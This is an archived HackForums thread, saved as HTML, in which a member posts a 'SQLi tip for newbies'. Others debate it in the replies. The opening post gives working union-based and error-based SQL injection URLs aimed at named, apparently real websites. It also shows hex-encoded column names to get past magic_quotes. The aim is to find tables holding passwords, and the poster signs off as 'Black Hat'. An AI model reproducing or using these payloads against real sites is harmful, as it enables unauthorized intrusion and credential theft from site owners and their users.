<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=2900495" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=2900495" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=2900495</a>. It is a snapshot of the page as it appeared on 13 Mar 2014 10:36:13 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=2900495" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:t2mUiwN8cBwJ:www.hackforums.net/showthread.php%3Ftid%3D2900495&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>SQLi tip for newbies - searching in tables - Page 1</title> <meta name="description" content="SQL Injection Attacks-SQLi tip for newbies - searching in tables"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=2900495"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 03-13-2014, 03:36 AM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/logo_bl.gif" alt="Hack Forums" title="Hack Forums"></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">SQLi tip for newbies - searching in tables</span></div><br><div class="quick_keys"><div class="float_left"><div class="pagination"><span class="pages">Pages (2):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=2900495&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=2900495&amp;page=2" class="pagination_next">Next »</a></div></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=2900495" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/rating.js"></script><div id="success_rating_2900495" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_2900495"><li style="width: 0%" class="current_rating" id="current_rating_2900495">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=2900495&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2900495&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2900495&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2900495&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2900495&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_2900495" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_2900495_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=2900495" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=2900495&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_2900495");
// -->
</script><div><strong>SQLi tip for newbies - searching in tables</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid26809031" id="pid26809031"></a><table class="tborder" style="border-top-width: 0; " id="post_26809031" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-28-2012, 05:30 PM <span id="edited_by_26809031"><span class="smalltext">(This post was last modified: 09-29-2012 06:12 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543">ajkaro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2900495&amp;pid=26809031#pid26809031">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 137<br>Posts: 2,247<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">212</strong></a><br><span style="white-space:normal; width: 100%;"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26809031">Many times we search for specific data in tables.<br><br><span style="font-weight: bold;"><span style="color: #00BFFF;"><span style="font-size: large;">Some SQL basics</span></span></span><br>We can use different SQL statements for that.<br><br><span style="font-weight: bold;"><span style="color: #FFD700;">SELECT * FROM articles WHERE title = 'SQLi tutorial for newbies' </span></span><br>This will give use all articles with this specific title.<br><br>We can also search using wildcards. SQL wildcards must be used with the SQL LIKE operator.<br><br><span style="font-weight: bold;"><span style="color: #FFD700;">SELECT * FROM articles WHERE title LIKE 'SQLi%'</span></span><br>This will give use all articles with title starting with SQLi<br><br><span style="font-weight: bold;"><span style="color: #FFD700;">SELECT * FROM articles WHERE title LIKE '%tutorial%'</span></span><br>This will give use all articles with title containing 'tutorial'<br><br><span style="font-weight: bold;"><span style="color: #00BFFF;"><span style="font-size: large;">Searching in SQLi</span></span></span><br>Imagine this situation: we want to find out table(s) in database where column <span style="color: #32CD32;">password</span> exists.<br><br>How can we do this using union select based SQLi:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marmota.com/news.php?id=-1
 union select 1,2,group_concat(table_name),4 from 
information_schema.columns where column_name='password'--</code></div></div><br>Sometimes this doesn't work and we must change <span style="color: #32CD32;">password</span> to hex (0x70617373776f7264)<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marmota.com/news.php?id=-1
 union select 1,2,group_concat(table_name),4 from 
information_schema.columns where column_name=0x70617373776f7264--</code></div></div><br>And we get result: <span style="color: #FFD700;">admin_users</span><br><br>How can we do this using error based SQli:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marinaplast.com/page.php?id=13<br>or
 1 group by concat((select table_name from information_schema.columns 
where column_name=0x70617373776f7264 limit 0,1),floor(rand(0)*2))having 
min(0) or 1--+-</code></div></div><br>And we get result: <span style="color: #FFD700;">admins</span><br>If we are using limit than with changing limit we can come to other possible tables in database with column <span style="color: #32CD32;">password</span> (if they exists).<br><br>We can also search using different functions (<span style="color: #FF6347;">MID, LOCATE, POSITION, INSTR</span> ...) like:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marmota.com/news.php?id=-1
 union select 1,2,group_concat(table_name),4 from 
information_schema.columns where 
locate(0x70617373776f7264,column_name)!=0--</code></div></div><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marinaplast.com/page.php?id=13<br>or
 1 group by concat((select table_name from information_schema.columns 
where locate(0x70617373776f7264,column_name)!=0 
limit+0,1),floor(rand(0)*2))having min(0) or 1--+-</code></div></div><br>For complete explanation how to use this functions read SQL tutorials. You can find links for interactive SQL learning here <a href="http://www.hackforums.net/showthread.php?tid=2887420" target="_blank">http://www.hackforums.net/showthread.php?tid=2887420</a><br><br>And remember: <span style="color: #00BFFF;">without proper SQL knowledge you can't do SQLi.</span><br><br><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_26809031"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2900495&amp;replyto=26809031" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26816577" id="pid26816577"></a><table class="tborder" style="margin-top: 5px; " id="post_26816577" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-29-2012, 01:08 AM <span id="edited_by_26816577"><span class="smalltext">(This post was last modified: 09-29-2012 01:59 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1298994">Zixem</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2900495&amp;pid=26816577#pid26816577">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1298994"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/5Mbiw.jpg" alt="" height="86" width="75"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1298994"><span class="group29">Zixem</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">75, jez gimme two months<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 110<br>Posts: 1,329<br>Joined: May 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1298994"><strong class="reputation_positive">341</strong></a><br><span style="white-space:normal; width: 100%;"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26816577"><blockquote><cite>ajkaro Wrote:</cite>Imagine this situation: we want to find out all tables in database where column <span style="color: #32CD32;">password</span> exists.</blockquote>You didn't found out all the data. you just dump one value, and you all the time needs to play with the <span style="font-style: italic;">LIMIT</span>.<br><br><blockquote><cite>ajkaro Wrote:</cite>Sometimes this doesn't work and we must change <span style="color: #32CD32;">password</span> to hex (0x70617373776f7264)</blockquote><br>What do you mean "Sometimes this doesn't work". Tell the peoples that happends because <span style="color: #00BFFF;">magic_quotes_gpc</span> turned on.<br><br>And, you need to separate the <span style="font-style: italic;"><span style="color: #00BFFF;">1</span></span> from the table name...you can do it with <span style="color: #FFD700;"><span style="font-style: italic;">concat()</span></span>. <img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/BjGRm.png" alt="[Image: BjGRm.png]" border="0"></div><div class="post_meta" id="post_meta_26816577"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://zixem.altervista.org/" target="_blank" class="bitButton" rel="nofollow" title="Visit this user's website">WWW</a> <a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1298994" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2900495&amp;replyto=26816577" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26817685" id="pid26817685"></a><table class="tborder" style="margin-top: 5px; " id="post_26817685" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-29-2012, 02:28 AM <span id="edited_by_26817685"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2900495&amp;pid=26817685#pid26817685">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 137<br>Posts: 2,247<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">212</strong></a> <br><span style="white-space:normal; width: 100%;"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26817685"><blockquote><cite><span>(09-29-2012 01:08 AM)</span>Ѕyler Wrote: <a href="http://www.hackforums.net/showthread.php?pid=26816577#pid26816577" class="quick_jump">►</a></cite>You didn't found out all the data. you just dump one value, and you all the time needs to play with the <span style="font-style: italic;">LIMIT</span>.</blockquote><br>Sometimes we must play with limit...<br><br>I
 wasn't talking about collecting data. I was talking about finding in 
which table column password exists. With searching described above this 
is much quicker than getting table names one by one using limit... to 
find some table name where we think column password could be. It is 
quicker to search for 'password', 'pass', 'user_password' then getting 
table name one by one with limit 0,1 ... 1,1 ... 2,1 ... to found out 
after for example 30,1 there is table ci_admin where we can expect 
column password.<br><br><blockquote><cite>Quote:</cite>What do you mean "Sometimes this doesn't work". Tell the peoples that happends because <span style="color: #00BFFF;">magic_quotes_gpc</span> turned on.</blockquote><br>Now you told them. Thanx.</div><div class="post_meta" id="post_meta_26817685"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2900495&amp;replyto=26817685" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26820009" id="pid26820009"></a><table class="tborder" style="margin-top: 5px; " id="post_26820009" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-29-2012, 05:11 AM <span id="edited_by_26820009"><span class="smalltext">(This post was last modified: 09-29-2012 05:14 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1298994">Zixem</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2900495&amp;pid=26820009#pid26820009">#4</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1298994"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/5Mbiw.jpg" alt="" height="86" width="75"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1298994"><span class="group29">Zixem</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">75, jez gimme two months<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 110<br>Posts: 1,329<br>Joined: May 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1298994"><strong class="reputation_positive">341</strong></a><br><span style="white-space:normal; width: 100%;"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26820009"><blockquote><cite><span>(09-29-2012 02:28 AM)</span>ajkaro Wrote: <a href="http://www.hackforums.net/showthread.php?pid=26817685#pid26817685" class="quick_jump">►</a></cite>Sometimes we must play with limit...</blockquote><br>Again, it doesn't looks like that..<br><blockquote><cite>ajkaro Wrote:</cite>Imagine this situation: we want to find out <span style="font-size: large;">all tables</span> in database where column password exists.</blockquote><br>What
 if there is two tables with password column? It will find only the 
first one and the hacker won't think to play with the LIMIT anymore 
because you said "find out all the tables"...He thinks that all the 
tables.<br>Change it to: "Collect all the tables one by one where column password exists."<br><br><blockquote><cite>ajkaro Wrote:</cite>Now you told them. Thanx.</blockquote>No you didn't :&lt;</div><div class="post_meta" id="post_meta_26820009"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://zixem.altervista.org/" target="_blank" class="bitButton" rel="nofollow" title="Visit this user's website">WWW</a> <a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1298994" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2900495&amp;replyto=26820009" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26820181" id="pid26820181"></a><table class="tborder" style="margin-top: 5px; " id="post_26820181" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-29-2012, 05:23 AM <span id="edited_by_26820181"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2900495&amp;pid=26820181#pid26820181">#5</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 137<br>Posts: 2,247<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">212</strong></a><br><span style="white-space:normal; width: 100%;"><img 